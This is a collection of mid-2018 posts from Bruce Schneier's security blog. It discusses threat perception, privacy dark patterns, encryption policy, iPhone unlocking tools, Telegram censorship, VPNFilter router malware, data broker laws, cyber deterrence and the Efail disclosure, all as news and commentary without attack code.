Friday Squid Blogging: Fried Squid with Turmeric
Good-looking recipe.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
Good-looking recipe.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
Here’s some interesting research about how we perceive threats. Basically, as the environment becomes safer we basically manufacture new threats. From an essay about the research:
To study how concepts change when they become less common, we brought volunteers into our laboratory and gave them a simple task —to look at a series of computer-generated faces and decide which ones seem “threatening.” The faces had been carefully designed by researchers to range from very intimidating to very harmless.
As we showed people fewer and fewer threatening faces over time, we found that they expanded their definition of “threatening” to include a wider range of faces. In other words, when they ran out of threatening faces to find, they started calling faces threatening that they used to call harmless. Rather than being a consistent category, what people considered “threats” depended on how many threats they had seen lately.
This has a lot of implications in security systems where humans have to make judgments about threat and risk: TSA agents, police noticing “suspicious” activities, “see something say something” campaigns, and so on.
The academic paper.
The Norwegian Consumer Council just published an excellent report on the deceptive practices tech companies use to trick people into giving up their privacy.
From the executive summary:
Facebook and Google have privacy intrusive defaults, where users who want the privacy friendly option have to go through a significantly longer process. They even obscure some of these settings so that the user cannot know that the more privacy intrusive option was preselected.
The popups from Facebook, Google and Windows 10 have design, symbols and wording that nudge users away from the privacy friendly choices. Choices are worded to compel users to make certain choices, while key information is omitted or downplayed. None of them lets the user freely postpone decisions. Also, Facebook and Google threaten users with loss of functionality or deletion of the user account if the user does not choose the privacy intrusive option.
[…]
The combination of privacy intrusive defaults and the use of dark patterns, nudge users of Facebook and Google, and to a lesser degree Windows 10, toward the least privacy friendly options to a degree that we consider unethical. We question whether this is in accordance with the principles of data protection by default and data protection by design, and if consent given under these circumstances can be said to be explicit, informed and freely given.
I am a big fan of the Norwegian Consumer Council. They’ve published some excellent research.
The IEEE came out in favor of strong encryption:
IEEE supports the use of unfettered strong encryption to protect confidentiality and integrity of data and communications. We oppose efforts by governments to restrict the use of strong encryption and/or to mandate exceptional access mechanisms such as “backdoors” or “key escrow schemes” in order to facilitate government access to encrypted data. Governments have legitimate law enforcement and national security interests. IEEE believes that mandating the intentional creation of backdoors or escrow schemes—no matter how well intentioned—does not serve those interests well and will lead to the creation of vulnerabilities that would result in unforeseen effects as well as some predictable negative consequences
The full statement is here.
Last week, a story was going around explaining how to brute-force an iOS password. Basically, the trick was to plug the phone into an external keyboard and trying every PIN at once:
We reported Friday on Hickey’s findings, which claimed to be able to send all combinations of a user’s possible passcode in one go, by enumerating each code from 0000 to 9999, and concatenating the results in one string with no spaces. He explained that because this doesn’t give the software any breaks, the keyboard input routine takes priority over the device’s data-erasing feature.
I didn’t write about it, because it seemed too good to be true. A few days later, Apple pushed back on the findings—and it seems that it doesn’t work.
This isn’t to say that no one can break into an iPhone. We know that companies like Cellebrite and Grayshift are renting/selling iPhone unlock tools to law enforcement—which means governments and criminals can do the same thing—and that Apple is releasing a new feature called “restricted mode” that may make those hacks obsolete.
Grayshift is claiming that its technology will still work.
Former Apple security engineer Braden Thomas, who now works for a company called Grayshift, warned customers who had bought his GrayKey iPhone unlocking tool that iOS 11.3 would make it a bit harder for cops to get evidence and data out of seized iPhones. A change in the beta didn’t break GrayKey, but would require cops to use GrayKey on phones within a week of them being last unlocked.
“Starting with iOS 11.3, iOS saves the last time a device has been unlocked (either with biometrics or passcode) or was connected to an accessory or computer. If a full seven days (168 hours) elapse [sic] since the last time iOS saved one of these events, the Lightning port is entirely disabled,” Thomas wrote in a blog post published in a customer-only portal, which Motherboard obtained. “You cannot use it to sync or to connect to accessories. It is basically just a charging port at this point. This is termed USB Restricted Mode and it affects all devices that support iOS 11.3.”
Whether that’s real or marketing, we don’t know.
We’re starting to see research into designing speculative execution systems that avoid Spectre- and Meltdown-like security problems. Here’s one.
I don’t know if this particular design is secure. My guess is that we’re going to see several iterations of design and attack before we settle on something that works. But it’s good to see the research results emerge.
News article.
In this 2013 TED talk, oceanographer Edith Widder explains how her team captured the giant squid on video.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
The Center for Human Rights in Iran has released a report outlining the effect’s of that country’s ban on Telegram, a secure messaging app used by about half of the country.
The ban will disrupt the most important, uncensored platform for information and communication in Iran, one that is used extensively by activists, independent and citizen journalists, dissidents and international media. It will also impact electoral politics in Iran, as centrist, reformist and other relatively moderate political groups that are allowed to participate in Iran’s elections have been heavily and successfully using Telegram to promote their candidates and electoral lists during elections. State-controlled domestic apps and media will not provide these groups with such a platform, even as they continue to do so for conservative and hardline political forces in the country, significantly aiding the latter.
From a Wired article:
Researchers found that the ban has had broad effects, hindering and chilling individual speech, forcing political campaigns to turn to state-sponsored media tools, limiting journalists and activists, curtailing international interactions, and eroding businesses that grew their infrastructure and reach off of Telegram.
It’s interesting that the analysis doesn’t really center around the security properties of Telegram, but more around its ubiquity as a messaging platform in the country.
I missed this story when it came around last year: someone tried to steal a domain name at gunpoint. He was just sentenced to 20 years in jail.
Algeria shut the Internet down nationwide to prevent high-school students from cheating on their exams.
The solution in New South Wales, Australia was to ban smartphones.
EDITED TO ADD (6/22): Slashdot thread.
Apple is rolling out an iOS security usability feature called Security code AutoFill. The basic idea is that the OS scans incoming SMS messages for security codes and suggests them in AutoFill, so that people can use them without having to memorize or type them.
Sounds like a really good idea, but Andreas Gutmann points out an application where this could become a vulnerability: when authenticating transactions:
Transaction authentication, as opposed to user authentication, is used to attest the correctness of the intention of an action rather than just the identity of a user. It is most widely known from online banking, where it is an essential tool to defend against sophisticated attacks. For example, an adversary can try to trick a victim into transferring money to a different account than the one intended. To achieve this the adversary might use social engineering techniques such as phishing and vishing and/or tools such as Man-in-the-Browser malware.
Transaction authentication is used to defend against these adversaries. Different methods exist but in the one of relevance here—which is among the most common methods currently used—the bank will summarise the salient information of any transaction request, augment this summary with a TAN tailored to that information, and send this data to the registered phone number via SMS. The user, or bank customer in this case, should verify the summary and, if this summary matches with his or her intentions, copy the TAN from the SMS message into the webpage.
This new iOS feature creates problems for the use of SMS in transaction authentication. Applied to 2FA, the user would no longer need to open and read the SMS from which the code has already been conveniently extracted and presented. Unless this feature can reliably distinguish between OTPs in 2FA and TANs in transaction authentication, we can expect that users will also have their TANs extracted and presented without context of the salient information, e.g. amount and destination of the transaction. Yet, precisely the verification of this salient information is essential for security. Examples of where this scenario could apply include a Man-in-the-Middle attack on the user accessing online banking from their mobile browser, or where a malicious website or app on the user’s phone accesses the bank’s legitimate online banking service.
This is an interesting interaction between two security systems. Security code AutoFill eliminates the need for the user to view the SMS or memorize the one-time code. Transaction authentication assumes the user read and approved the additional information in the SMS message before using the one-time code.
Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:
It seeks to explain why the United States is struggling to deal with the “soft” cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society—a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication—create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.
I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don’t matter to a totalitarian country. That makes us more vulnerable. (I don’t mean to imply—and neither do Russell and Goldsmith—that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)
I do worry that these disadvantages will someday become intolerable. Dan Geer often said that “the price of freedom is the probability of crime.” We are willing to pay this price because it isn’t that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don’t know.
EDITED TO ADD (6/21): Jack Goldsmith also wrote this.
Tapplock sells an “unbreakable” Internet-connected lock that you can open with your fingerprint. It turns out that:
Regarding the third flaw, the manufacturer has responded that “…the lock is invincible to the people who do not have a screwdriver.”
You can’t make this stuff up.
EDITED TO ADD: The quote at the end is from a different smart lock manufacturer. Apologies for that.
It’s Cephalopod Week! “Three hearts, eight arms, can’t lose.”
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
For many years, I have said that complexity is the worst enemy of security. At CyCon earlier this month, Thomas Dullien gave an excellent talk on the subject with far more detail than I’ve ever provided. Video. Slides.
Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or capitulating in order to maximize their business. Today’s Internet largely reflects the dominance of a handful of companies behind the cloud services, search engines and mobile platforms that underpin the technology landscape. This new centralization radically tips the balance between those who want to censor parts of the Internet and those trying to evade censorship. When the profitable answer is for a software giant to acquiesce to censors’ demands, how long can Internet freedom last?
The recent battle between the Russian government and the Telegram messaging app illustrates one way this might play out. Russia has been trying to block Telegram since April, when a Moscow court banned it after the company refused to give Russian authorities access to user messages. Telegram, which is widely used in Russia, works on both iPhone and Android, and there are Windows and Mac desktop versions available. The app offers optional end-to-end encryption, meaning that all messages are encrypted on the sender’s phone and decrypted on the receiver’s phone; no part of the network can eavesdrop on the messages.
Since then, Telegram has been playing cat-and-mouse with the Russian telecom regulator Roskomnadzor by varying the IP address the app uses to communicate. Because Telegram isn’t a fixed website, it doesn’t need a fixed IP address. Telegram bought tens of thousands of IP addresses and has been quickly rotating through them, staying a step ahead of censors. Cleverly, this tactic is invisible to users. The app never sees the change, or the entire list of IP addresses, and the censor has no clear way to block them all.
A week after the court ban, Roskomnadzor countered with an unprecedented move of its own: blocking 19 million IP addresses, many on Amazon Web Services and Google Cloud. The collateral damage was widespread: The action inadvertently broke many other web services that use those platforms, and Roskomnadzor scaled back after it became clear that its action had affected services critical for Russian business. Even so, the censor is still blocking millions of IP addresses.
More recently, Russia has been pressuring Apple not to offer the Telegram app in its iPhone App Store. As of this writing, Apple has not complied, and the company has allowed Telegram to download a critical software update to iPhone users (after what the app’s founder called a delay last month). Roskomnadzor could further pressure Apple, though, including by threatening to turn off its entire iPhone app business in Russia.
Telegram might seem a weird app for Russia to focus on. Those of us who work in security don’t recommend the program, primarily because of the nature of its cryptographic protocols. In general, proprietary cryptography has numerous fatal security flaws. We generally recommend Signal for secure SMS messaging, or, if having that program on your computer is somehow incriminating, WhatsApp. (More than 1.5 billion people worldwide use WhatsApp.) What Telegram has going for it is that it works really well on lousy networks. That’s why it is so popular in places like Iran and Afghanistan. (Iran is also trying to ban the app.)
What the Russian government doesn’t like about Telegram is its anonymous broadcast feature—channel capability and chats—which makes it an effective platform for political debate and citizen journalism. The Russians might not like that Telegram is encrypted, but odds are good that they can simply break the encryption. Telegram’s role in facilitating uncontrolled journalism is the real issue.
Iran attempts to block Telegram have been more successful than Russia’s, less because Iran’s censorship technology is more sophisticated but because Telegram is not willing to go as far to defend Iranian users. The reasons are not rooted in business decisions. Simply put, Telegram is a Russian product and the designers are more motivated to poke Russia in the eye. Pavel Durov, Telegram’s founder, has pledged millions of dollars to help fight Russian censorship.
For the moment, Russia has lost. But this battle is far from over. Russia could easily come back with more targeted pressure on Google, Amazon and Apple. A year earlier, Zello used the same trick Telegram is using to evade Russian censors. Then, Roskomnadzor threatened to block all of Amazon Web Services and Google Cloud; and in that instance, both companies forced Zello to stop its IP-hopping censorship-evasion tactic.
Russia could also further develop its censorship infrastructure. If its capabilities were as finely honed as China’s, it would be able to more effectively block Telegram from operating. Right now, Russia can block only specific IP addresses, which is too coarse a tool for this issue. Telegram’s voice capabilities in Russia are significantly degraded, however, probably because high-capacity IP addresses are easier to block.
Whatever its current frustrations, Russia might well win in the long term. By demonstrating its willingness to suffer the temporary collateral damage of blocking major cloud providers, it prompted cloud providers to block another and more effective anti-censorship tactic, or at least accelerated the process. In April, Google and Amazon banned—and technically blocked—the practice of “domain fronting,” a trick anti-censorship tools use to get around Internet censors by pretending to be other kinds of traffic. Developers would use popular websites as a proxy, routing traffic to their own servers through another website—in this case Google.com—to fool censors into believing the traffic was intended for Google.com. The anonymous web-browsing tool Tor has used domain fronting since 2014. Signal, since 2016. Eliminating the capability is a boon to censors worldwide.
Tech giants have gotten embroiled in censorship battles for years. Sometimes they fight and sometimes they fold, but until now there have always been options. What this particular fight highlights is that Internet freedom is increasingly in the hands of the world’s largest Internet companies. And while freedom may have its advocates—the American Civil Liberties Union has tweeted its support for those companies, and some 12,000 people in Moscow protested against the Telegram ban—actions such as disallowing domain fronting illustrate that getting the big tech companies to sacrifice their near-term commercial interests will be an uphill battle. Apple has already removed anti-censorship apps from its Chinese app store.
In 1993, John Gilmore famously said that “The Internet interprets censorship as damage and routes around it.” That was technically true when he said it but only because the routing structure of the Internet was so distributed. As centralization increases, the Internet loses that robustness, and censorship by governments and companies becomes easier.
This essay previously appeared on Lawfare.com.
iOS 12, the next release of Apple’s iPhone operating system, may include features to prevent someone from unlocking your phone without your permission:
The feature essentially forces users to unlock the iPhone with the passcode when connecting it to a USB accessory everytime the phone has not been unlocked for one hour. That includes the iPhone unlocking devices that companies such as Cellebrite or GrayShift make, which police departments all over the world use to hack into seized iPhones.
“That pretty much kills [GrayShift’s product] GrayKey and Cellebrite,” Ryan Duff, a security researcher who has studied iPhone and is Director of Cyber Solutions at Point3 Security, told Motherboard in an online chat. “If it actually does what it says and doesn’t let ANY type of data connection happen until it’s unlocked, then yes. You can’t exploit the device if you can’t communicate with it.”
This is part of a bunch of security enhancements in iOS 12:
Other enhancements include tools for generating strong passwords, storing them in the iCloud keychain, and automatically entering them into Safari and iOS apps across all of a user’s devices. Previously, standalone apps such as 1Password have done much the same thing. Now, Apple is integrating the functions directly into macOS and iOS. Apple also debuted new programming interfaces that allow users to more easily access passwords stored in third-party password managers directly from the QuickType bar. The company also announced a new feature that will flag reused passwords, an interface that autofills one-time passwords provided by authentication apps, and a mechanism for sharing passwords among nearby iOS devices, Macs, and Apple TVs.
A separate privacy enhancement is designed to prevent websites from tracking people when using Safari. It’s specifically designed to prevent share buttons and comment code on webpages from tracking people’s movements across the Web without permission or from collecting a device’s unique settings such as fonts, in an attempt to fingerprint the device.
The last additions of note are new permission dialogues macOS Mojave will display before allowing apps to access a user’s camera or microphone. The permissions are designed to thwart malicious software that surreptitiously turns on these devices in an attempt to spy on users. The new protections will largely mimic those previously available only through standalone apps such as one called Oversight, developed by security researcher Patrick Wardle. Apple said similar dialog permissions will protect the file system, mail database, message history, and backups.
On May 25, the FBI asked us all to reboot our routers. The story behind this request is one of sophisticated malware and unsophisticated home-network security, and it’s a harbinger of the sorts of pervasive threats from nation-states, criminals and hackers that we should expect in coming years.
VPNFilter is a sophisticated piece of malware that infects mostly older home and small-office routers made by Linksys, MikroTik, Netgear, QNAP and TP-Link. (For a list of specific models, click here.) It’s an impressive piece of work. It can eavesdrop on traffic passing through the router specifically, log-in credentials and SCADA traffic, which is a networking protocol that controls power plants, chemical plants and industrial systems attack other targets on the Internet and destructively “kill” its infected device. It is one of a very few pieces of malware that can survive a reboot, even though that’s what the FBI has requested. It has a number of other capabilities, and it can be remotely updated to provide still others. More than 500,000 routers in at least 54 countries have been infected since 2016.
Because of the malware’s sophistication, VPNFilter is believed to be the work of a government. The FBI suggested the Russian government was involved for two circumstantial reasons. One, a piece of the code is identical to one found in another piece of malware, called BlackEnergy, that was used in the December 2015 attack against Ukraine’s power grid. Russia is believed to be behind that attack. And two, the majority of those 500,000 infections are in Ukraine and controlled by a separate command-and-control server. There might also be classified evidence, as an FBI affidavit in this matter identifies the group behind VPNFilter as Sofacy, also known as APT28 and Fancy Bear. That’s the group behind a long list of attacks, including the 2016 hack of the Democratic National Committee.
Two companies, Cisco and Symantec, seem to have been working with the FBI during the past two years to track this malware as it infected ever more routers. The infection mechanism isn’t known, but we believe it targets known vulnerabilities in these older routers. Pretty much no one patches their routers, so the vulnerabilities have remained, even if they were fixed in new models from the same manufacturers.
On May 30, the FBI seized control of toknowall.com, a critical VPNFilter command-and-control server. This is called “sinkholing,” and serves to disrupt a critical part of this system. When infected routers contact toknowall.com, they will no longer be contacting a server owned by the malware’s creators; instead, they’ll be contacting a server owned by the FBI. This doesn’t entirely neutralize the malware, though. It will stay on the infected routers through reboot, and the underlying vulnerabilities remain, making the routers susceptible to reinfection with a variant controlled by a different server.
If you want to make sure your router is no longer infected, you need to do more than reboot it, the FBI’s warning notwithstanding. You need to reset the router to its factory settings. That means you need to reconfigure it for your network, which can be a pain if you’re not sophisticated in these matters. If you want to make sure your router cannot be reinfected, you need to update the firmware with any security patches from the manufacturer. This is harder to do and may strain your technical capabilities, though it’s ridiculous that routers don’t automatically download and install firmware updates on their own. Some of these models probably do not even have security patches available. Honestly, the best thing to do if you have one of the vulnerable models is to throw it away and get a new one. (Your ISP will probably send you a new one free if you claim that it’s not working properly. And you should have a new one, because if your current one is on the list, it’s at least 10 years old.)
So if it won’t clear out the malware, why is the FBI asking us to reboot our routers? It’s mostly just to get a sense of how bad the problem is. The FBI now controls toknowall.com. When an infected router gets rebooted, it connects to that server to get fully reinfected, and when it does, the FBI will know. Rebooting will give it a better idea of how many devices out there are infected.
Should you do it? It can’t hurt.
Internet of Things malware isn’t new. The 2016 Mirai botnet, for example, created by a lone hacker and not a government, targeted vulnerabilities in Internet-connected digital video recorders and webcams. Other malware has targeted Internet-connected thermostats. Lots of malware targets home routers. These devices are particularly vulnerable because they are often designed by ad hoc teams without a lot of security expertise, stay around in networks far longer than our computers and phones, and have no easy way to patch them.
It wouldn’t be surprising if the Russians targeted routers to build a network of infected computers for follow-on cyber operations. I’m sure many governments are doing the same. As long as we allow these insecure devices on the Internet and short of security regulations, there’s no way to stop them we’re going to be vulnerable to this kind of malware.
And next time, the command-and-control server won’t be so easy to disrupt.
This essay previously appeared in the Washington Post
EDITED TO ADD: The malware is more capable than we previously thought.
Interesting fossils. Note that a poster is available.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
When Mark Zuckerberg testified before both the House and the Senate last month, it became immediately obvious that few US lawmakers had any appetite to regulate the pervasive surveillance taking place on the Internet.
Right now, the only way we can force these companies to take our privacy more seriously is through the market. But the market is broken. First, none of us do business directly with these data brokers. Equifax might have lost my personal data in 2017, but I can’t fire them because I’m not their customer or even their user. I could complain to the companies I do business with who sell my data to Equifax, but I don’t know who they are. Markets require voluntary exchange to work properly. If consumers don’t even know where these data brokers are getting their data from and what they’re doing with it, they can’t make intelligent buying choices.
This is starting to change, thanks to a new law in Vermont and another in Europe. And more legislation is coming.
Vermont first. At the moment, we don’t know how many data brokers collect data on Americans. Credible estimates range from 2,500 to 4,000 different companies. Last week, Vermont passed a law that will change that.
The law does several things to improve the security of Vermonters’ data, but several provisions matter to all of us. First, the law requires data brokers that trade in Vermonters’ data to register annually. And while there are many small local data brokers, the larger companies collect data nationally and even internationally. This will help us get a more accurate look at who’s in this business. The companies also have to disclose what opt-out options they offer, and how people can request to opt out. Again, this information is useful to all of us, regardless of the state we live in. And finally, the companies have to disclose the number of security breaches they’ve suffered each year, and how many individuals were affected.
Admittedly, the regulations imposed by the Vermont law are modest. Earlier drafts of the law included a provision requiring data brokers to disclose how many individuals’ data it has in its databases, what sorts of data it collects and where the data came from, but those were removed as the bill negotiated its way into law. A more comprehensive law would allow individuals to demand to exactly what information they have about them—and maybe allow individuals to correct and even delete data. But it’s a start, and the first statewide law of its kind to be passed in the face of strong industry opposition.
Vermont isn’t the first to attempt this, though. On the other side of the country, Representative Norma Smith of Washington introduced a similar bill in both 2017 and 2018. It goes further, requiring disclosure of what kinds of data the broker collects. So far, the bill has stalled in the state’s legislature, but she believes it will have a much better chance of passing when she introduces it again in 2019. I am optimistic that this is a trend, and that many states will start passing bills forcing data brokers to be increasingly more transparent in their activities. And while their laws will be tailored to residents of those states, all of us will benefit from the information.
A 2018 California ballot initiative could help. Among its provisions, it gives consumers the right to demand exactly what information a data broker has about them. If it passes in November, once it takes effect, lots of Californians will take the list of data brokers from Vermont’s registration law and demand this information based on their own law. And again, all of us—regardless of the state we live in—will benefit from the information.
We will also benefit from another, much more comprehensive, data privacy and security law from the European Union. The General Data Protection Regulation (GDPR) was passed in 2016 and took effect on 25 May. The details of the law are far too complex to explain here, but among other things, it mandates that personal data can only be collected and saved for specific purposes and only with the explicit consent of the user. We’ll learn who is collecting what and why, because companies that collect data are going to have to ask European users and customers for permission. And while this law only applies to EU citizens and people living in EU countries, the disclosure requirements will show all of us how these companies profit off our personal data.
It has already reaped benefits. Over the past couple of weeks, you’ve received many e-mails from companies that have you on their mailing lists. In the coming weeks and months, you’re going to see other companies disclose what they’re doing with your data. One early example is PayPal: in preparation for GDPR, it published a list of the over 600 companies it shares your personal data with. Expect a lot more like this.
Surveillance is the business model of the Internet. It’s not just the big companies like Facebook and Google watching everything we do online and selling advertising based on our behaviors; there’s also a large and largely unregulated industry of data brokers that collect, correlate and then sell intimate personal data about our behaviors. If we make the reasonable assumption that Congress is not going to regulate these companies, then we’re left with the market and consumer choice. The first step in that process is transparency. These new laws, and the ones that will follow, are slowly shining a light on this secretive industry.
This essay originally appeared in the Guardian.
In 2016, the US was successfully deterred from attacking Russia in cyberspace because of fears of Russian capabilities against the US.
I have two citations for this. The first is from the book Russian Roulette: The Inside Story of Putin’s War on America and the Election of Donald Trump, by Michael Isikoff and David Corn. Here’s the quote:
The principals did discuss cyber responses. The prospect of hitting back with cyber caused trepidation within the deputies and principals meetings. The United States was telling Russia this sort of meddling was unacceptable. If Washington engaged in the same type of covert combat, some of the principals believed, Washington’s demand would mean nothing, and there could be an escalation in cyber warfare. There were concerns that the United States would have more to lose in all-out cyberwar.
“If we got into a tit-for-tat on cyber with the Russians, it would not be to our advantage,” a participant later remarked. “They could do more to damage us in a cyber war or have a greater impact.” In one of the meetings, Clapper said he was worried that Russia might respond with cyberattacks against America’s critical infrastructure—and possibly shut down the electrical grid.
The second is from the book The World as It Is, by President Obama’s deputy national security advisor Ben Rhodes. Here’s the New York Times writing about the book.
Mr. Rhodes writes he did not learn about the F.B.I. investigation until after leaving office, and then from the news media. Mr. Obama did not impose sanctions on Russia in retaliation for the meddling before the election because he believed it might prompt Moscow into hacking into Election Day vote tabulations. Mr. Obama did impose sanctions after the election but Mr. Rhodes’s suggestion that the targets include President Vladimir V. Putin was rebuffed on the theory that such a move would go too far.
When people try to claim that there’s no such thing as deterrence in cyberspace, this serves as a counterexample.
EDITED TO ADD: Remember the blog rules. Comments that are not about the narrow topic of deterrence in cyberspace will be deleted. Please take broader discussions of the 2016 US election elsewhere.
We all know that it happens: when we see a security warning too often—and without effect—we start tuning it out. A new paper uses fMRI, eye tracking, and field studies to prove it.
EDITED TO ADD (6/6): This blog post summarizes the findings.
Ross Anderson has a new paper on cryptocurrency exchanges. From his blog:
Bitcoin Redux explains what’s going wrong in the world of cryptocurrencies. The bitcoin exchanges are developing into a shadow banking system, which do not give their customers actual bitcoin but rather display a “balance” and allow them to transact with others. However if Alice sends Bob a bitcoin, and they’re both customers of the same exchange, it just adjusts their balances rather than doing anything on the blockchain. This is an e-money service, according to European law, but is the law enforced? Not where it matters. We’ve been looking at the details.
The paper.
Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.
But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they’ve fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it’s fixed. Or, if you know how to do it, turn off your e-mail client’s ability to process HTML e-mail or—even better—stop decrypting e-mails from within the client. There’s even more complex advice for more sophisticated users, but if you’re one of those, you don’t need me to explain this to you.
Consider your encrypted e-mail insecure until this is fixed.
All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It’s a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.
Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.
Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names—the e-mail vulnerability is called “Efail“—websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.
This simultaneous announcement is best for security. While it’s always possible that some organization—either government or criminal—has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.
Things get much more complicated when multiple vendors are involved. In this case, Efail isn’t a vulnerability in a particular product; it’s a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that’s close to impossible.
Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn’t leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser—honestly, a really bad idea—which resulted in details leaking.
After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published—and lots of press followed.
All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or—even more problematic—communities without clear ownership. And that’s what we have with OpenPGP. It’s even worse when the bug involves the interaction between different parts of a system. In this case, there’s nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn’t its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.
Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use—our phones and computers—to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won’t be. Sometimes it’ll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don’t even know who to blame for that one.
It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn’t true for many of the embedded and low-cost Internet of things software packages. They’re designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn’t anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren’t patchable at all. Right now, if you own a digital video recorder that’s vulnerable to being recruited for a botnet—remember Mirai from 2016?—the only way to patch it is to throw it away and buy a new one.
Patching is starting to fail, which means that we’re losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it’s hard to see any other viable alternative.
Getting back to e-mail, the truth is that it’s incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated and have been difficult to properly use the whole time. If we could start again, we would design something better and more user friendlybut the huge number of legacy applications that use the existing standards mean that we can’t. I tell people that if they want to communicate securely with someone, to use one of the secure messaging systems: Signal, Off-the-Record, or—if having one of those two on your system is itself suspicious—WhatsApp. Of course they’re not perfect, as last week’s announcement of a vulnerability (patched within hours) in Signal illustrates. And they’re not as flexible as e-mail, but that makes them easier to secure.
This essay previously appeared on Lawfare.com.
Maybe not DNA, but biological somethings.
“Cause of Cambrian explosion—Terrestrial or Cosmic?“:
Abstract: We review the salient evidence consistent with or predicted by the Hoyle-Wickramasinghe (H-W) thesis of Cometary (Cosmic) Biology. Much of this physical and biological evidence is multifactorial. One particular focus are the recent studies which date the emergence of the complex retroviruses of vertebrate lines at or just before the Cambrian Explosion of ~500 Ma. Such viruses are known to be plausibly associated with major evolutionary genomic processes. We believe this coincidence is not fortuitous but is consistent with a key prediction of H-W theory whereby major extinction-diversification evolutionary boundaries coincide with virus-bearing cometary-bolide bombardment events. A second focus is the remarkable evolution of intelligent complexity (Cephalopods) culminating in the emergence of the Octopus. A third focus concerns the micro-organism fossil evidence contained within meteorites as well as the detection in the upper atmosphere of apparent incoming life-bearing particles from space. In our view the totality of the multifactorial data and critical analyses assembled by Fred Hoyle, Chandra Wickramasinghe and their many colleagues since the 1960s leads to a very plausible conclusion—life may have been seeded here on Earth by life-bearing comets as soon as conditions on Earth allowed it to flourish (about or just before 4.1 Billion years ago); and living organisms such as space-resistant and space-hardy bacteria, viruses, more complex eukaryotic cells, fertilised ova and seeds have been continuously delivered ever since to Earth so being one important driver of further terrestrial evolution which has resulted in considerable genetic diversity and which has led to the emergence of mankind.
This is almost certainly not true.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
Playing a sound over the speakers can cause computers to crash and possibly even physically damage the hard drive.
Academic paper.
Sidebar photo of Bruce Schneier by Joe MacInnis.